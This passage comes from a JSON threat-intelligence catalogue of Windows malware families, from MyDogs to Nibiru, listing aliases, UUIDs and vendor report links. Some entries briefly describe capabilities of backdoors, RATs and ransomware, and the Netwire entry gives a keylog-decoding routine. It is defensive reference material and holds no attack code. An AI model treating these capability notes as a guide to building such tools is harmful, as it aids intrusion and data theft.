"771113e1-8550-4dc2-b2ad-7298ae381cb5", "value": "Mutabaha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/" ], "synonyms": [], "type": [] }, "uuid": "77d74e8c-664a-42b7-a55d-735ea138a898", "value": "MyDogs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom", "https://www.malware-traffic-analysis.net/2018/12/19/index.html", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503", "https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069", "http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf" ], "synonyms": [ "Mimail", "Novarg" ], "type": [] }, "uuid": "ac3483f9-522e-4fbc-b072-e5f76972e7b3", "value": "MyDoom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", "https://blog.talosintelligence.com/2020/07/valak-emerges.html", "https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [], "type": [] }, "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", "value": "MyKings Spreader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", "https://blog.centurylink.com/mylobot-continues-global-infections/", "https://github.com/360netlab/DGA/issues/36", "http://www.freebuf.com/column/153424.html", "https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html", "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" ], "synonyms": [ "FakeDGA", "WillExec" ], "type": [] }, "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", "value": "MyloBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mzrevenge", "https://dissectingmalwa.re/a-projectexe-that-should-have-stayed-in-a-drawer-mzrevenge-mamo434376.html" ], "synonyms": [ "MaMo434376" ], "type": [] }, "uuid": "5cb1091c-bfe7-440c-a8c7-b652e205e65b", "value": "MZRevenge" }, { "description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware", "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector", "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html", "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/" ], "synonyms": [], "type": [] }, "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", "value": "N40" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" ], "synonyms": [], "type": [] }, "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", "value": "Nabucur" }, { "description": "According to FireEye, NACHOCHEESE is a command-line tunneler that accepts delimited C&C IPs or domains via command-line and gives actors shell access to a victim's system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b", "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/", "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html" ], "synonyms": [ "Cyruslish", "TWOPENCE", "VIVACIOUSGIFT" ], "type": [] }, "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", "value": "NACHOCHEESE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" ], "synonyms": [], "type": [] }, "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", "value": "Nagini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", "value": "Naikon" }, { "description": "Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/", "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/", "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.ic3.gov/media/news/2020/200917-1.pdf", "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://goggleheadedhacker.com/blog/post/11", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://malwareindepth.com/defeating-nanocore-and-cypherit/", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a" ], "synonyms": [ "Nancrat", "NanoCore" ], "type": [] }, "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", "value": "Nanocore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" ], "synonyms": [], "type": [] }, "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", "value": "NanoLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" ], "synonyms": [], "type": [] }, "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", "value": "Narilam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "d8295eba-60ef-4900-8091-d694180de565", "value": "Nautilus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" ], "synonyms": [], "type": [] }, "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", "value": "NavRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan", "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", "https://vblocalhost.com/uploads/VB2020-20.pdf" ], "synonyms": [], "type": [] }, "uuid": "85056c54-f8f1-4a98-93cb-322cc1deb52c", "value": "nccTrojan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.secureworks.com/research/threat-profiles/gold-riverview", "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/", "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/" ], "synonyms": [ "nucurs" ], "type": [] }, "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", "value": "Necurs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] }, "uuid": "f061ad00-c215-478e-ae31-77fcdc2f4963", "value": "NedDnLoader" }, { "description": "According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data", "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/", "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/" ], "synonyms": [ "Nephilim Ransomware" ], "type": [] }, "uuid": "895f088e-a862-462c-a754-6593c6a471da", "value": "Nefilim Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", "https://www.secureworks.com/research/threat-profiles/tungsten-bridge", "http://blog.nsfocus.net/darkhotel-3-0908/" ], "synonyms": [ "Nemain" ], "type": [] }, "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", "value": "Nemim" }, { "description": "Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed through similar ways as Sodinokibi and also noted artfifacts they had seen before in Gandcrab.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/", "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/", "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/", "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/", "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/", "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md", "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b" ], "synonyms": [], "type": [] }, "uuid": "465696be-d576-4750-9469-89e19984f3df", "value": "Nemty" }, { "description": "Neshta is a 2005 Belarusian file infector virus . The name of the virus comes from the Belarusian word \"nesta\" meaning \"something.\" The program is a Windows application (exe file). Written in Delphi . The size of the original malicious file is 41,472 bytes . This file virus is the type of virus that is no longer popular at present.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta", "https://www.virusradar.com/en/Win32_Neshta.A/description", "https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest", "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html" ], "synonyms": [], "type": [] }, "uuid": "13d2482d-21fc-4044-891e-a7fb2b1660e9", "value": "neshta" }, { "description": "NESTEGG is a memory-only backdoor that can proxy commands to other\r\ninfected systems using a custom routing scheme. It accepts commands to\r\nupload and download files, list and delete files, list and terminate processes, and\r\nstart processes. NESTEGG also creates Windows Firewall rules that allows the\r\nbackdoor to bind to a specified port number to allow for inbound traffic.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg", "https://content.fireeye.com/apt/rpt-apt38", "https://youtu.be/_kzFNQySEMw?t=789", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf", "https://youtu.be/8hJyLkLHH8Q?t=1208", "https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html" ], "synonyms": [], "type": [] }, "uuid": "fce1f9a7-bac7-4b11-8ea7-3c72931cd14a", "value": "NESTEGG" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", "value": "NetC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "Neteagle_Scout", "ScoutEagle" ], "type": [] }, "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", "value": "NETEAGLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netflash", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" ], "synonyms": [], "type": [] }, "uuid": "88b2b4ac-9e46-4bc6-b4f6-bf5ddd70ad31", "value": "NetFlash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netkey", "https://twitter.com/kevinperlow/status/1156406115472760835" ], "synonyms": [], "type": [] }, "uuid": "b8ec2602-c5e5-4b49-a50e-bb3d9676abc3", "value": "NetKey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" ], "synonyms": [], "type": [] }, "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", "value": "Netrepser" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", "http://www.netsupportmanager.com/index.asp" ], "synonyms": [ "NetSupport" ], "type": [] }, "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", "value": "NetSupportManager RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", "https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [ "TravNet" ], "type": [] }, "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", "value": "NetTraveler" }, { "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.circl.lu/pub/tr-23/", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://news.drweb.ru/show/?i=13281&c=23", "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/", "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" ], "synonyms": [ "NetWeird", "NetWire", "Recam" ], "type": [] }, "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", "value": "NetWire RC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", "https://www.ncsc.gov.uk/alerts/turla-group-malware" ], "synonyms": [], "type": [] }, "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", "value": "Neuron" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", "http://blog.ptsecurity.com/2019/08/finding-neutrino.html" ], "synonyms": [ "Kasidet" ], "type": [] }, "uuid": "3760920e-4d1a-40d8-9e60-508079499076", "value": "Neutrino" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", "https://securelist.com/neutrino-modification-for-pos-terminals/78839/" ], "synonyms": [], "type": [] }, "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", "value": "Neutrino POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html", "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations", "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view", "https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6" ], "synonyms": [], "type": [] }, "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", "value": "NewCore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass", "https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/" ], "synonyms": [], "type": [] }, "uuid": "c1dbbd04-050c-47ce-8164-791f17a4a6b4", "value": "NewPass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" ], "synonyms": [], "type": [] }, "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", "value": "NewPosThings" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", "value": "NewsReels" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "CT" ], "type": [] }, "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", "value": "NewCT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", "https://twitter.com/benkow_/status/789006720668405760" ], "synonyms": [], "type": [] }, "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", "value": "Nexster Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/", "https://twitter.com/PhysicalDrive0/status/842853292124360706" ], "synonyms": [], "type": [] }, "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", "value": "NexusLogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html", "https://research.checkpoint.com/ramnits-network-proxy-servers/" ], "synonyms": [ "Grobios" ], "type": [] }, "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", "value": "Ngioweb (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nibiru", "https://blog.talosintelligence.com/2020/11/Nibiru-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "5a998606-a9a9-42ad-affb-9be37e11ec25", "value": "Nibiru" }, { "description": "", "meta": { 